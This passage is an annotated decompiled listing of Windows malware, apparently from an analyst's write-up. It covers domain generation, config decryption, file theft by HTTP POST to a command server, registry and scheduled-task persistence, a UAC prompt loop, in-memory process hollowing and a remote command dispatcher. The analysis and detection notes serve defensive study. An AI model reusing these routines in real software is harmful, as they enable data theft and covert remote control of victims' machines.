'"OK" becomes MY_DOMAIN and cnc_post_and_read(0) is issued. If none answers, the
'process terminates (End).
'Note: `0 & domain_generate(...)` is decompiler residue; in this listing domain_generate
'is a Sub that leaves its result in the module-level domain_name.
Public Sub Proc_0_10_40655C | |
'Data Table: 401634 | |
Dim var_94 As Long | |
Dim arg_2008 As Variant | |
loc_406350: On Error Resume Next | |
loc_406361: If (Len(Me(120)) < &HB) Then | |
'Me(104) settings record: DGA-related fields filled from params &H25..&H28.
loc_40636B: var_94 = Me(104) | |
loc_406382: var_94(44) = load_param(&H25, &HFF) | |
loc_40639F: var_94(4) = CLng(load_param(&H26, &HFF)) | |
loc_4063BC: var_94(8) = CLng(load_param(&H27, &HFF)) | |
loc_4063D9: var_94(12) = CLng(load_param(&H28, &HFF)) | |
loc_4063FA: For var_A8 = 0 To Me(112): var_90 = var_A8 'Long | |
loc_406411: var_A0 = 0 & domain_generate(var_90, var_A0, 0) | |
loc_406422: If (var_90 <> Me(112)) Then | |
loc_40642E: var_A0 = var_A0 & vbCrLf | |
loc_406431: End If | |
loc_406436: Next var_A8 'Long | |
loc_406460: arg_2008 = Split(var_A0, vbCrLf, -1, 0) | |
loc_40646A: var_8C = arg_2008 | |
loc_406476: Else | |
loc_40649F: arg_2008 = Split(Me(120), vbCrLf, -1, 0) | |
loc_4064A9: var_8C = arg_2008 | |
loc_4064B2: End If | |
loc_4064C5: For var_E4 = 0 To UBound(var_8C, 1): var_90 = var_E4 'Long | |
loc_4064D9: domain = Trim$(var_8C(var_90)) | |
loc_4064F3: If ((domain <> 0) And (Len(domain) > &HA)) Then | |
loc_4064F8: test_connection_microsoft(0) | |
loc_40651C: If (process_data(domain, 0) = "OK") Then | |
loc_406524: MY_DOMAIN = domain | |
loc_40652B: cnc_post_and_read(0) | |
loc_406532: Exit For | |
loc_406535: End If | |
loc_406537: End If | |
loc_40653E: Next var_E4 'Long | |
loc_406543: ' Referenced from: 406532 | |
loc_406551: If (MY_DOMAIN = 0) Then | |
loc_406556: End | |
loc_406558: End If | |
loc_40655A: Exit Sub | |
End Sub | |
'Connectivity gate: blocks until UnknownFunc("http://www.microsoft.com") returns
'non-zero, sleeping 10 s (&H2710 = 10000 ms) between attempts. There is no retry limit.
Public Sub test_connection_microsoft | |
'Data Table: 401634 | |
loc_403F4C: On Error Resume Next | |
loc_403F4F: ' Referenced from: 403F8F | |
loc_403F7E: If (UnknownFunc("http://www.microsoft.com") = 0) Then | |
loc_403F88: Sleep(&H2710) | |
loc_403F8F: GoTo loc_403F4F | |
loc_403F92: End If | |
loc_403F94: Exit Sub | |
End Sub | |
'Raw decompiled DGA; the cleaned listing at the top of this gist renames
'var_C0 = baseStr, var_90 = vDay, var_94 = vMonth, var_98 = vYear, domain_ext = ext.
'arg_C is a day offset from the start of the current Me(116)-day period (seed date
'Me(120)); the URL "http://<name>.<ext>/gate.php" is left in the module-level domain_name.
Public Sub domain_generate(arg_C) '407084 | |
'Data Table: 401634 | |
Dim var_BC As Double | |
Dim var_AC As Long | |
Dim var_A8 As Double | |
Dim var_90 As Single | |
Dim var_94 As Single | |
Dim var_98 As Single | |
Dim arg_2008 As Variant | |
Dim var_9C As Long | |
loc_406E18: On Error Resume Next | |
loc_406E28: var_C0 = Me(92) & Me(124) | |
loc_406E3F: var_BC = CDate(DateValue(Me(120))) | |
loc_406E6E: var_AC = CLng((DateValue(CStr(Now)) - CDate(var_BC))) | |
loc_406E86: If (var_AC < 0) Then | |
loc_406E8B: Exit Sub | |
loc_406E8E: End | |
loc_406E90: End If | |
loc_406EAD: var_A8 = CDate((var_BC + CDbl((var_AC - (var_AC Mod Me(116)))))) | |
loc_406ECC: var_90 = CDbl(Day(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
loc_406EF2: var_94 = CDbl(Month(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
loc_406F18: var_98 = CDbl(Year(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
loc_406F49: arg_2008 = Split(Me(148), "|", -1, 0) | |
'Mod binds tighter than Xor: index = month Xor (day Mod UBound).
loc_406F74: domain_ext = arg_2008((CLng(var_94) Xor CLng(var_90) Mod UBound(arg_2008, 1))) | |
loc_406FB6: var_9C = (((CLng(var_98) And &HFF00) / &H100) * CLng((var_90 * Tan(CDbl((CLng(var_98) And &HFF))))) Xor CLng(Cos((var_94 * CDbl(&HA))))) | |
loc_406FBF: var_9C = Abs(var_9C) | |
loc_406FCF: If CBool((var_9C Mod 2)) Then | |
loc_406FE6: var_9C = var_9C Xor (CLng(var_98) / CLng((var_94 * var_90))) | |
loc_406FE9: End If | |
loc_406FF8: For var_11C = 1 To Me(108): var_C4 = var_11C 'Long | |
loc_407039: domain_name = domain_name & Mid$(var_C0, Abs((((var_9C * var_C4 Xor CLng((CDbl(var_9C) / CDbl(2)))) Mod Len(var_C0)) - Len(var_C0))), 1) | |
loc_407047: Next var_11C 'Long | |
loc_407072: domain_name = "http://" & LCase$(domain_name & "." & domain_ext) & "/gate.php" | |
loc_407082: Exit Sub | |
End Sub | |
'Path-existence probe: returns CBool(GetAttr(arg_C)). GetAttr raises on a missing path
'and Resume Next swallows that, so a missing path yields False; note a present file
'with attributes = 0 (vbNormal) also yields False.
Public Sub get_attribute1(arg_C) '403BB4 | |
'Data Table: 401634 | |
loc_403B9C: On Error Resume Next | |
loc_403BB0: Result CBool(GetAttr(arg_C)) End Sub 'Integer | |
End Sub | |
'Folder deletion helper used by Proc_0_7_404894. Reads a flag from the FSO-style object
'MemVar_402104 into var_86 (the decompiler dropped the call - presumably FolderExists),
'and when arg_10 (second argument, missing from the decompiled signature) is true calls
'DeleteFolder and returns True; otherwise returns False.
Public Sub Proc_0_14_403F14 | |
'Data Table: 401634 | |
Dim var_86 As Integer | |
Dim var_B8 As Boolean | |
loc_403ED0: On Error Resume Next | |
loc_403EE1: LateMemCallLdVar | |
loc_403EEB: var_86 = CBool(MemVar_402104) | |
loc_403EF6: If arg_10 Then | |
loc_403F02: var_B8 = True | |
loc_403F0B: Call MemVar_402104.DeleteFolder | |
loc_403F11: End If | |
loc_403F13: Result var_B8 End Sub 'Integer | |
End Sub | |
'Terminates a process by image name through shell_execute("taskkill /IM <name> /F");
'the name is lower-cased first. The process creation of taskkill.exe with these
'arguments is an observable artifact.
Public Sub kill_task(arg_C) '403D28 | |
'Data Table: 401634 | |
On Error Resume Next | |
shell_execute("taskkill /IM " & LCase$(arg_C) & " /F ") | |
Exit Sub | |
End Sub | |
'Raw decompiled configuration decryptor; see the cleaned listing at the top of this gist.
'Name mapping: var_AC = key upper bound, var_B6 = wrap flag, var_B0 = key index,
'var_B4 = schedule index, var_A0 = 286-entry key schedule.
'Output: module-level `result` (plaintext string); errors are suppressed by Resume Next.
Public Sub decrypt(str1_arg, str2_arg) '406ABC | |
'Data Table: 401634 | |
Dim var_AC As Long | |
Dim var_B6 As Integer | |
Dim var_B0 As Long | |
Dim var_B4 As Long | |
loc_406870: On Error Resume Next | |
'&H80 = vbFromUnicode: string -> byte array.
loc_40689C: str1 = StrConv(str1_arg, &H80, 0) | |
loc_4068CA: str2 = StrConv(str2_arg, &H80, 0) | |
loc_4068D8: var_AC = UBound(str2, 1) | |
loc_4068EA: For index1 = 0 To &HFF: _indx = index1 'Long | |
loc_4068FC: var_A0(_indx ) = CInt(_indx ) | |
loc_406902: Next index1 'Long | |
'Entries 256..285 hold 0..29.
loc_406916: For var_F4 = &H100 To &H11D: _indx = var_F4 'Long | |
loc_40692F: var_A0(_indx ) = CInt(_indx Xor &H100) | |
loc_406935: Next var_F4 'Long | |
'Key-dependent entries: last six key bytes into 250..255, first six mixed with them.
loc_406949: For var_FC = 1 To 6: _indx = var_FC 'Long | |
loc_40696B: var_A0((_indx + &HF9)) = CInt(str2((var_AC - _indx ))) | |
loc_40699E: var_A0((_indx - 1)) = CInt(str2((_indx - 1))) Xor (255 - CInt(str2((var_AC - _indx )))) | |
loc_4069A4: Next var_FC 'Long | |
loc_4069AD: var_B6 = 0 | |
loc_4069C1: var_B4 = 0 | |
loc_4069D5: For var_104 = 0 To UBound(str1, 1): _indx = var_104 'Long | |
'NOTE(review): `0 > var_AC` is never true for a non-empty key; likely a mangled wrap of
'var_B0 - confirm against the binary.
loc_4069E4: If (0 > var_AC) Then | |
loc_4069EE: var_B0 = 0 | |
loc_4069F1: End If | |
loc_406A03: If ((var_B4 > &H11D) And (var_B6 = 0)) Then | |
loc_406A0D: var_B4 = 0 | |
loc_406A16: var_B6 = Not(var_B6) | |
loc_406A19: End If | |
loc_406A2B: If ((var_B4 > &H11D) And (var_B6 = &HFF)) Then | |
loc_406A35: var_B4 = 5 | |
loc_406A3E: var_B6 = Not(var_B6) | |
loc_406A41: End If | |
loc_406A6A: str1(_indx) = CByte(CInt(str1(_indx)) Xor var_A0(var_B4) Xor CInt(str2(var_B0))) | |
loc_406A77: var_B0 = (var_B0 + 1) | |
loc_406A85: var_B4 = (var_B4 + 1) | |
loc_406A8D: Next var_104 'Long | |
'&H40 = vbUnicode: byte array -> string.
loc_406AB2: result = CStr(StrConv(str1, &H40, 0)) | |
loc_406ABA: Exit Sub | |
End Sub | |
'Base64 decoder via a COM object created from get_object_type(4): setting DataType to
'"bin.base64" and reading nodeTypedValue is the MSXML DOM-element idiom, so the object is
'presumably an MSXML element - confirm get_object_type. The decoded bytes are converted
'to a string with StrConv &H40 (vbUnicode) and left in var_88.
Public Sub base64_decode(arg_C) '404AA8 | |
'Data Table: 401634 | |
Dim var_B8 As Variant | |
loc_4049E8: On Error Resume Next | |
loc_404A0D: CAdVar | |
'"b64" is presumably the element tag name passed to createElement (call dropped).
loc_404A1B: var_B8 = "b64" | |
loc_404A24: LateMemCallLdVar | |
loc_404A2C: CAdVar | |
loc_404A3A: Set var_CC = CreateObject(get_object_type(4), 0) | |
loc_404A49: var_CC.DataType = "bin.base64" | |
loc_404A59: var_CC.Text = CVar(arg_C) | |
loc_404A82: var_88 = CStr(StrConv(var_CC.nodeTypedValue, &H40, 0)) | |
loc_404A90: Set var_CC = Nothing | |
loc_404A98: Set var_90 = Nothing | |
loc_404AA0: Set var_8C = Nothing | |
loc_404AA6: Exit Sub | |
End Sub | |
'String obfuscator (likely for outbound data): picks a random key 1..99, folds the
'characters of Me(124) into var_98, XORs each character of arg_C with key + Int(var_98)
'building the output reversed (each char is prepended), prefixes the key byte, then
'hex-encodes the result into var_88.
'Note: var_90 only ever receives the "0" padding in this listing - the hex digits
'themselves were lost by the decompiler; and Randomize is seeded with an uninitialised rnd.
Public Sub Proc_0_18_405D30(arg_C) '405D30 | |
'Data Table: 401634 | |
Dim var_9C As Long | |
Dim rnd As Integer | |
Dim var_98 As Double | |
loc_405BBC: On Error Resume Next | |
loc_405BC4: Randomize(rnd) | |
loc_405BE1: var_9C = CLng(Int(((Rnd(rnd) * CDbl(&H63)) + CDbl(1)))) | |
loc_405BF7: For var_C8 = 1 To Len(Me(124)): var_A0 = var_C8 'Long | |
loc_405C30: var_98 = (CDbl(Asc(Mid$(Me(124), var_A0, 1))) * Abs(Cos(Sqr(var_98)))) | |
loc_405C3E: Next var_C8 'Long | |
loc_405C51: For var_DC = 1 To Len(arg_C): var_A0 = var_DC 'Long | |
loc_405C8B: var_8C = Chr$(CLng(Asc(Mid$(arg_C, var_A0, 1))) Xor CLng((CDbl(var_9C) + Int(var_98)))) & var_8C | |
loc_405C9D: Next var_DC 'Long | |
loc_405CB3: var_8C = Chr$(var_9C) & var_8C | |
loc_405CC7: For var_E8 = 1 To Len(var_8C): var_A0 = var_E8 'Long | |
loc_405D08: If (Len(Hex$(CVar(Asc(Mid$(var_8C, var_A0, 1))))) = 1) Then | |
loc_405D14: var_90 = "0" & var_90 | |
loc_405D17: End If | |
loc_405D20: var_88 = var_88 & var_90 | |
loc_405D28: Next var_E8 'Long | |
loc_405D2F: Exit Sub | |
End Sub | |
'Derives the config decryption key (used by main as decrypt's second argument) from the
'LENGTH of the blob only: the fractional digits of Round(Cos(Sqr(Len(arg_C))), 15), each
'digit replaced by its ASCII code and concatenated into var_88. Because no secret is
'involved, the key is recoverable from the encrypted blob alone.
Public Sub Proc_0_19_404CD8(arg_C) '404CD8 | |
'Data Table: 401634 | |
loc_404C78: var_8C = CStr(Split(Str$(Round(CVar(Cos(Sqr(CDbl(Len(arg_C))))), &HF)), ".", -1, 0)(1)) | |
loc_404C9B: For var_13C = 1 To Len(var_8C): var_94 = var_13C 'Long | |
loc_404CC2: var_88 = var_88 & CStr(Asc(Mid$(var_8C, var_94, 1))) | |
loc_404CD2: Next var_13C 'Long | |
loc_404CD7: Exit Sub | |
End Sub | |
'Elevation prompt loop (config param &HF, run when main is not elevated). Counts the
'running instances of the own image (Proc_0_21_404594), launches cmd.exe /c "<own path>"
'with the "RunAs" verb via the Shell object from get_object_type(3), waits while
'consent.exe is running, then compares the instance count: if no new instance appeared
'(prompt declined) it calls itself again, otherwise the current process ends.
'Detection angle: repeated consent.exe launches from a cmd.exe /c "<path>" parent.
Public Sub Proc_0_20_4054D4 | |
'Data Table: 401634 | |
Dim MemVar_40B3A4 As Global | |
Dim var_8A As Integer | |
Dim var_AC As Variant | |
Dim var_CC As Variant | |
Dim var_EC As Variant | |
Dim var_10C As String | |
Dim var_12C As Integer | |
loc_4053A0: On Error Resume Next | |
loc_4053B1: var_90 = MemVar_40B3A4.App | |
loc_4053CE: var_8A = Proc_0_21_404594(App.EXEName & ".exe") | |
loc_4053FD: CAdVar | |
'ShellExecute arguments lifted into var_AC (file), var_CC (params), var_EC (dir),
'var_10C (verb) and var_12C (show = 0) by the decompiler.
loc_405414: var_AC = CVar(SYSTEM32_DIR & "cmd.exe") 'String | |
loc_40542F: var_CC = CVar("/c " & """" & Me(88) & """") 'String | |
loc_405438: var_EC = CVar(0) 'String | |
loc_40543C: var_10C = "RunAs" | |
loc_405442: var_12C = 0 | |
loc_40544B: Call CreateObject(get_object_type(3, 0), var_8A).ShellExecute | |
loc_405463: Set var_88 = Nothing | |
'Busy-wait while the UAC consent dialog process exists.
loc_405467: ' Referenced from: 405482 | |
loc_40547F: If (Proc_0_21_404594("consent" & ".exe", var_12C, var_10C) > 0) Then | |
loc_405482: GoTo loc_405467 | |
loc_405485: End If | |
loc_405493: var_90 = MemVar_40B3A4.App | |
loc_4054BE: If (Proc_0_21_404594(App.EXEName & ".exe", var_EC) <= var_8A) Then | |
loc_4054C3: Proc_0_20_4054D4(var_CC) | |
loc_4054CB: Else | |
loc_4054CD: End | |
loc_4054CF: End If | |
loc_4054D1: Exit Sub | |
End Sub | |
'Process counter: runs the WMI query "select * from win32_Process where Name='<arg_C>'"
'through GetObject("winmgmts:") and returns the result Count. The query string is
'assembled from fragments, presumably to defeat static string matching.
Public Sub Proc_0_21_404594(arg_C) '404594 | |
'Data Table: 401634 | |
Dim var_104 As Variant | |
loc_40453D: var_104 = CVar("select * from " & "win32_" & "Process" & " where " & "Name" & "='" & arg_C & "'") 'String | |
loc_40455A: VarLateMemCallLdVar | |
loc_404562: CAdVar | |
loc_404593: Result CInt(GetObject("winmgmts:", var_E4).Count) End Sub 'Integer | |
End Sub | |
'Config accessor. PARAMS_STORAGE holds entries of the form  tt>value<tt  where tt is a
'two-character tag. The tag table (&H29 = 41 tags) is generated on every call: the first
'character starts at Len(PARAMS_STORAGE) - &H3C and the second walks "a","c","e",...;
'so the tag names depend on the blob length and differ per config.
'Parameters:
'  index        - position of the tag in the generated table
'  is_encrypted - when true, the value is run through decrypt(value, Me(92))
'Returns (in var_88): CStr(&HFF) when the stored value is "1", CStr(0) when the tag is
'absent. NOTE(review): the assignment of other raw values to var_88 is missing from the
'decompiled output (main base64-decodes load_param(3, 0), so it must exist) - confirm.
Public Sub load_param(index, is_encrypted) '4067E8 | |
'Data Table: 401634 | |
Dim var_B0 As Integer | |
Dim var_AE As Integer | |
Dim arg_2008 As Variant | |
Dim var_B4 As Long | |
Dim var_B8 As Long | |
loc_4065B0: On Error Resume Next | |
loc_4065C2: var_B0 = CInt((Len(PARAMS_STORAGE) - &H3C)) | |
'Wrap the start offset into the bounds of var_A0 (undeclared; presumably the alphabet).
loc_4065C5: ' Referenced from: 4065F8 | |
loc_4065DA: If ((LBound(var_A0, 1) + CLng(var_B0)) > UBound(var_A0, 1)) Then | |
loc_4065F3: var_B0 = CInt(((LBound(var_A0, 1) + CLng(var_B0)) - UBound(var_A0, 1))) | |
loc_4065F8: GoTo loc_4065C5 | |
loc_4065FB: End If | |
'Build the comma-separated tag list; second char cycles through &H61.. ("a".."z") in steps of 2.
loc_40660A: For var_C4 = 1 To &H29: var_BC = var_C4 'Long | |
loc_40661B: If ((&H61 + var_AE) >= &H7B) Then | |
loc_406622: var_AE = 0 | |
loc_40662D: var_B0 = (var_B0 + 1) | |
loc_406630: End If | |
loc_406643: If ((LBound(var_A0, 1) + CLng(var_B0)) > &H7A) Then | |
loc_40664A: var_B0 = 1 | |
loc_40664D: End If | |
loc_406679: var_A8 = var_A8 & Chr$((LBound(var_A0, 1) + CLng(var_B0))) & Chr$(CLng((&H61 + var_AE))) | |
loc_40668D: var_AE = (var_AE + 2) | |
loc_40669B: If (var_BC < &H29) Then | |
loc_4066B1: var_A8 = var_A8 & Chr$(&H2C) | |
loc_4066B7: End If | |
loc_4066BC: Next var_C4 'Long | |
loc_4066EE: arg_2008 = Split(var_A8, CVar(Chr$(&H2C)), -1, 0) | |
loc_4066F8: var_AC = arg_2008 | |
'Value starts after "tt>" (&H3E) and ends before "<tt" (&H3C).
loc_406736: var_B4 = (InStr(1, PARAMS_STORAGE, var_AC(CLng(index)) & Chr$(&H3E), 0) + 3) | |
loc_40676A: var_B8 = InStr(var_B4, PARAMS_STORAGE, Chr$(&H3C) & var_AC(CLng(index)), 0) | |
loc_40677F: If (var_B8 <> 0) Then | |
loc_4067AC: If (Mid$(PARAMS_STORAGE, var_B4, CVar((var_B8 - var_B4))) = "1") Then | |
loc_4067B5: var_88 = CStr(&HFF) | |
loc_4067B8: End If | |
loc_4067BD: If is_encrypted Then | |
loc_4067CF: var_88 = decrypt(var_88, Me(92)) | |
loc_4067D2: End If | |
loc_4067D5: Else | |
loc_4067DD: var_88 = CStr(0) | |
loc_4067E0: End If | |
loc_4067E4: Exit Sub | |
End Sub | |
'File exfiltration: POSTs the contents of `file` as a single multipart/form-data part to
'MY_DOMAIN?<abc>=1, where <abc> = Left$(Me(124), 3) is also the form field Name.
'Parameters:
'  file     - local path; skipped unless it exists and is longer than 10 bytes
'  filename - name sent in Content-Disposition
'  type     - non-zero: body is the file converted with StrConv &H80 and cut with Mid$(.., 2, var_E0)
'             (var_E0 is not set in this listing); zero: raw file_binary_open output
'Always returns &HFF. The three GUID method calls take ("POST", url), ("Content-Type",
'...) and (body) - presumably Open / SetRequestHeader / Send of an HTTP request object.
'Network artifact: multipart POST with Content-Type ": file" and a random boundary.
Public Sub post_content(file, filename, type) '407344 | |
'Data Table: 401634 | |
Dim var_AC As Variant | |
Dim var_104 As String | |
Dim var_D0 As Variant | |
loc_407103: If ((FileLen(file) > &HA) And get_attribute1(file)) Then | |
loc_407108: On Error Resume Next | |
loc_407111: Set var_98 = New | |
loc_40711B: boundary_id = make_random_string() | |
loc_407123: If type Then | |
loc_40715F: var_90 = Mid$(CStr(StrConv(CVar(file_binary_open(file)), &H80, 0)), 2, var_E0) | |
loc_407175: Else | |
loc_40717F: var_90 = file_binary_open(file) | |
loc_407182: End If | |
loc_4071D2: var_104 = "--" & boundary_id & vbCrLf & "Content-Disposition: form-data; Name=""" & Left$(Me(124), 3) & """; filename=""" | |
loc_40726D: var_AC = StrConv(var_104 & filename & """" & vbCrLf & "Content-Type" & ": file" & vbCrLf & vbCrLf & var_90 & vbCrLf & "--" & boundary_id & "--", &H80, 0) | |
loc_407289: Set var_138 = var_98 | |
loc_4072A1: var_D0 = False | |
loc_4072D0: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_24 ("POST", MY_DOMAIN & "?" & Left$(Me(124), 3) & "=1") | |
loc_407304: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_28 ("Content-Type", "multipart/" & "form-data" & "; boundary=" & boundary_id) | |
loc_407320: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_34 (var_AC) | |
loc_407329: Set var_138 = Nothing | |
loc_407334: Set var_98 = Nothing | |
loc_407337: End If | |
loc_407342: Result &HFF End Sub 'Integer | |
End Sub | |
'Persistence, each mechanism gated by a config slot:
'  Me(156) - copy the executable (Me(88)) to Me(40) & MY_APPNAME & ".exe"
'  Me(152) - HKCU\...\CurrentVersion\run\<MY_APPNAME>            (REG_SZ)
'  Me(154) - HKCU\...\CurrentVersion\RunOnce\<MY_APPNAME>        (REG_SZ)
'  Me(158) - HKCU\...\Policies\Explorer\Run\<MY_APPNAME>         (REG_SZ)
'  Me(160) - schtasks /create /sc ONLOGON /tn <MY_APPNAME>.exe /tr "<Me(88)>", only when
'            add_schtask <> &HFF (main passes 0 at install; the service loop passes &HFF,
'            so the task is created once and the registry values are re-written every 30 ticks).
'RegWrite / Run arguments were lifted into var_A0, var_D0, var_C0 and var_E0 by the decompiler;
'the registry data (presumably the executable path) is not visible here.
Public Sub make_persistent(add_schtask) '405B68 | |
'Data Table: 401634 | |
Dim var_A0 As Variant | |
Dim var_D0 As String | |
Dim var_C0 As Integer | |
Dim var_E0 As Boolean | |
loc_405A08: On Error Resume Next | |
loc_405A12: If Me(156) Then | |
loc_405A31: FileCopy Me(88), Me(40) & MY_APPNAME & ".exe" | |
loc_405A3D: End If | |
loc_405A44: Set var_90 = WSCRIPT_OBJ | |
loc_405A4F: If Me(152) Then | |
loc_405A5D: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\run\" & MY_APPNAME) 'String | |
loc_405A6A: var_D0 = "REG_SZ" | |
loc_405A73: Call var_90.RegWrite | |
loc_405A7C: End If | |
loc_405A83: If Me(154) Then | |
loc_405A91: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\" & MY_APPNAME) 'String | |
loc_405A9E: var_D0 = "REG_SZ" | |
loc_405AA7: Call var_90.RegWrite | |
loc_405AB0: End If | |
loc_405AB7: If Me(158) Then | |
loc_405AC5: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & MY_APPNAME) 'String | |
loc_405AD2: var_D0 = "REG_SZ" | |
loc_405ADB: Call var_90.RegWrite | |
loc_405AE4: End If | |
loc_405AEC: If (add_schtask <> &HFF) Then | |
loc_405AF6: If Me(160) Then | |
'Run arguments: command line, window style 0, wait-on-return False.
loc_405B30: var_A0 = CVar("schtasks /" & "create /sc ONLOGON /tn " & MY_APPNAME & ".exe" & " /tr " & """" & Me(88) & """") 'String | |
loc_405B34: var_C0 = 0 | |
loc_405B3A: var_E0 = False | |
loc_405B42: Call var_90.Run | |
loc_405B5A: End If | |
loc_405B5A: End If | |
loc_405B5E: Set var_90 = Nothing | |
loc_405B64: Exit Sub | |
End Sub | |
Public Sub Proc_0_25_4082A0(arg_C, arg_10, arg_14) '4082A0 | |
' Executes a downloaded PE image held in memory. | |
' arg_C  - PE image as a string; converted to a byte array (var_F0) with StrConv(&H80) | |
' arg_10 - "1" selects a path that touches this string's buffer (IStStrCopy); otherwise | |
'          callers pass a host executable path (e.g. SYSTEM32_DIR & "wscript.exe") | |
' arg_14 - optional command-line tail, prefixed with a space | |
' The visible logic is PE header parsing: MZ check (&H5A4D), e_lfanew at +&H3C, PE | |
' signature (&H4550), optional-header fields at +&H34/+&H50/+&H54/+&H28, a loop over | |
' NumberOfSections (+6) with &H28-byte section headers starting at +&HF8, a &H44-byte | |
' structure (var_B0), memory flags &H3000/&H40 and a CONTEXT with flags &H10007 whose | |
' register slots (var_E8(&H29), var_E8(&H2C)) are patched. This matches the well-known | |
' RunPE / process-hollowing pattern, but every Win32 call is masked as UnknownFunc or | |
' routed through Proc_0_26_403C5C, so the exact APIs must be confirmed dynamically. | |
' Detection angle: a child process started by this VB6 binary (or wscript.exe, see | |
' Proc_0_29_4059BC) whose mapped image does not match its on-disk file. | |
' Returns: early exit with a non-&HFF value if MZ or PE checks fail, else &HFF. | |
' var_F4 (section index) and var_CC are not initialised in this view - decompiler gaps. | |
'Data Table: 401634 | |
Dim var_124 As Long | |
Dim var_8C As Long | |
Dim var_90 As Long | |
Dim var_98 As Long | |
Dim var_128 As Long | |
Dim var_12C As Long | |
Dim var_94 As Long | |
loc_407F73: var_F0 = StrConv(arg_C, &H80, 0) | |
loc_407F80: If (arg_10 = "1") Then | |
loc_407F88: IStStrCopy | |
loc_407F8C: End If | |
loc_407F96: If (Len(arg_14) > 0) Then | |
loc_407FAA: arg_14 = ChrW$(&H20) & arg_14 | |
loc_407FB1: End If | |
loc_407FC2: var_124 = VarPtr(var_F0(0)) | |
loc_407FCB: var_8C = var_124 | |
' "MZ" magic check on the first WORD of the buffer. | |
loc_407FE1: If (Proc_0_26_403C5C(var_8C, 2, var_8C) <> &H5A4D) Then | |
loc_407FE4: Result var_124 End Sub 'Integer | |
loc_407FE5: End If | |
' var_90 = address of the NT headers (base + e_lfanew). | |
loc_407FFC: var_90 = (var_8C + Proc_0_26_403C5C((var_8C + &H3C), 4)) | |
' "PE\0\0" signature check. | |
loc_408012: If (Proc_0_26_403C5C(var_90, 4) <> &H4550) Then | |
loc_408015: Result var_90 End Sub 'Integer | |
loc_408016: End If | |
loc_408029: var_98 = Proc_0_26_403C5C((var_90 + &H34), 4) | |
loc_408039: var_B0(0) = &H44 | |
loc_40804D: var_128 = VarPtr(arg_14) | |
loc_40805E: var_12C = VarPtr(var_B0(0)) | |
loc_408096: UnknownFunc(VarPtr(arg_10)) | |
loc_4080A7: UnknownFunc(var_CC(0)) | |
loc_4080D2: var_12C = VarPtr(Proc_0_26_403C5C((var_90 + &H50), 4, VarPtr(var_98), var_98, VarPtr(var_98), 0, 0, 0)) | |
loc_4080F3: UnknownFunc(var_CC(0)) | |
loc_408109: var_124 = VarPtr(var_F0(0)) | |
loc_408122: var_128 = Proc_0_26_403C5C((var_90 + &H54), 4, var_124, var_128, 0, var_12C, &H3000, &H40) | |
loc_40813C: UnknownFunc(var_CC(0)) | |
' Per-section loop; var_94 points at the current &H28-byte section header. | |
loc_408162: For var_134 = var_12C To (Proc_0_26_403C5C((var_90 + 6), 2, var_F4, 0, var_98, var_124, var_128, 0) - 1): var_128 = var_134 'Long | |
loc_40817B: var_94 = ((var_90 + &HF8) + (&H28 * var_F4)) | |
loc_4081BD: var_12C = Proc_0_26_403C5C((var_94 + &H10), 4, Proc_0_26_403C5C((var_94 + &H14), 4, Proc_0_26_403C5C((var_94 + &HC), 4, var_94, var_12C, 4), 0)) | |
loc_4081DF: UnknownFunc(var_CC(0)) | |
loc_4081E7: Next var_134 'Long | |
' var_E8 is treated as a CONTEXT structure (&H10007 in the first slot). | |
loc_4081F9: var_E8(0) = &H10007 | |
loc_408211: UnknownFunc(var_CC(1)) | |
loc_408246: UnknownFunc(var_CC(0)) | |
' Slot &H2C receives a value derived from the field at NT headers + &H28 (+4). | |
loc_40826A: var_E8(&H2C) = (4 + Proc_0_26_403C5C((var_90 + &H28), 4, var_98, (var_E8(&H29) + 8), VarPtr(var_98))) | |
loc_408282: UnknownFunc(var_CC(1)) | |
loc_408295: UnknownFunc(var_CC(1)) | |
loc_40829F: Result &HFF End Sub 'Integer | |
End Sub | |
Public Sub Proc_0_26_403C5C | |
' Thin trampoline: stores the address of the return slot (var_88) and invokes a | |
' masked call (UnknownFunc(-1)). Callers in Proc_0_25_4082A0 pass (address, size, ...) | |
' tuples and use the result as a DWORD/WORD read, so this is presumably a memory-read | |
' or dynamically-resolved API dispatcher; the real parameter list was lost by the | |
' decompiler and cannot be confirmed from this listing. | |
'Data Table: 401634 | |
Dim var_8C As Long | |
loc_403C40: var_8C = VarPtr(var_88) | |
loc_403C56: UnknownFunc(-1) | |
loc_403C5B: Exit Sub | |
End Sub | |
Public Sub parse_and_execute_commands(params_str) '409670 | |
' C2 command dispatcher. params_str is "<command_id>|<argument>" (see cnc_post_and_read, | |
' which base64-decodes the server response before calling this). | |
' Visible command table (argument = var_8C unless noted): | |
'   0  fingerprint_system(arg)            1  download arg (process_data) and run in memory | |
'   2  download to %TEMP%\<rand><ext>, shell_execute   3  download .vbs/.exe, then | |
'      modify_bot_install(path, 0, &HFF) (update/replace) | |
'   4  "Explorer <arg>"                   5  "iexplore <arg>" via WScript.Shell.Run | |
'   6/7/8  Proc_0_29_4059BC(&HA, "1"/"2"/"3" & ident & arg)  9  Proc_0_29_4059BC(6, 0) | |
'   10 toggle OFF_C / HOSTS_PATH files    11 toggle POS component (Me(168), kill POS_EXE) | |
'   12 Proc_0_31_4046A4(0) (toggle LOGNAME component)   13 write MY_DIR\email.txt from | |
'      MY_DOMAIN?u=0 then Proc_0_29_4059BC(7, 0)        14/15 Proc_0_29_4059BC(8/9, arg) | |
'   16 reboot   17 shutdown   18 End (terminate)   19 DeleteSetting("L!NK") + | |
'      modify_bot_install("1", 0, &HFF) (uninstall)  20-22 Proc_0_29_4059BC(&HE, "1"/"2"/"3" ...) | |
'   23/24 Proc_0_29_4059BC(&HF, ...)      25 Proc_0_29_4059BC(&HE, "4" & ident & arg) | |
' ident (var_90) = "|" & MY_DOMAIN & "|" & Me(128) & "|". | |
' Defensive note: the same pipe-delimited, base64-wrapped response format is a good | |
' network detection hook; commands 2/3 drop files in %TEMP% with random names. | |
' Decompiler caveats: var_B0 is only set under command 5 but read under command 10; | |
' var_FC / var_D0 are dead or uninitialised; Me(...) are config fields. | |
'Data Table: 401634 | |
Dim var_D0 As Integer | |
